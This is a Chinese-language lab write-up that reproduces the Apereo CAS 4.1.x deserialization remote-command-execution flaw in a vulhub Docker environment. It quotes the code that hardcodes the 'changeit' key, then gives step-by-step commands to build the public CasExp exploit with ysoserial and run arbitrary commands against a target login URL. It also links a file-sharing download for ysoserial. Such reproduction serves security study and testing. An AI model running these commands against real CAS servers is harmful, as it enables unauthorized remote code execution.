Apereo CAS 4.1 反序列化漏洞复现

2022-11-02 14:26:28 浏览数 (1)

0x01 漏洞简介

Apereo CAS 是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。

  • 影响版本 Apereo CAS <= 4.1.7

0x02 环境准备

使用vulhub复现漏洞环境。

  • vulhub官网地址:https://vulhub.org
代码语言:javascript复制
cd vulhub/apereo-cas/4.1-rce
docker-compose up -d

环境启动后,访问 http://your-ip:8080/cas/login 即可查看到登录页面。

0x03 漏洞检测

该漏洞存在于登录的 execution 参数,使用Burp抓包可以发现该参数值。

0x04 漏洞利用

漏洞原理是 Webflow 中使用了默认密钥changeit:

代码语言:javascript复制
public class EncryptedTranscoder implements Transcoder {
    private CipherBean cipherBean;
    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {
        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
        bufferedBlockCipherBean.setKeyAlias("aes128");
        bufferedBlockCipherBean.setKeyPassword("changeit");
        bufferedBlockCipherBean.setNonce(new RBGNonce());
        this.setCipherBean(bufferedBlockCipherBean);
    }

    // ...

安装攻击利用工具

1、安装 jdk 1.8 ,配置好系统环境变量

2、安装 maven ,配置好系统环境变量

3、下载 ysoserial.jar 到 maven 安装目录下

代码语言:javascript复制
链接:https://pan.baidu.com/s/1nnmBKyQ6rSIzNrmeH5yEaA 
提取码:qx80

4、安装 ysoerial.jar 到本地 maven

代码语言:javascript复制
mvn org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file -Dfile=ysoserial.jar -DgroupId=ysoserial -DartifactId=ysoserial -Dversion=0.0.6 -Dpackaging=jar -DlocalRepositoryPath=my-repo

5、下载 CasExp 项目源码到本地

代码语言:javascript复制
git clone https://github.com/potats0/CasExp.git

6、打包CasExp源码为jar格式可执行文件

代码语言:javascript复制
mvn clean package assembly:single

7、打包好的jar文件在 CasExp-mastertarget 目录下

使用打包好的CasExp进行远程命令执行

代码语言:javascript复制
#工具命令格式:
java -jar CasPoc-1.0-SNAPSHOT-jar-with-dependencies.jar http://your-ip:8080/cas/login "执行的命令"

#工具命令示例:
java -jar CasPoc-1.0-SNAPSHOT-jar-with-dependencies.jar http://192.168.126.130:8080/cas/login "uname -a"

参考文章

  • https://apereo.github.io/2016/04/08/commonsvulndisc/
  • https://github.com/vulhub/vulhub/blob/master/apereo-cas/4.1-rce/README.zh-cn.md
  • https://github.com/potats0/CasExp/blob/master/readme.md
安全 https jar 网络安全 java

0 人点赞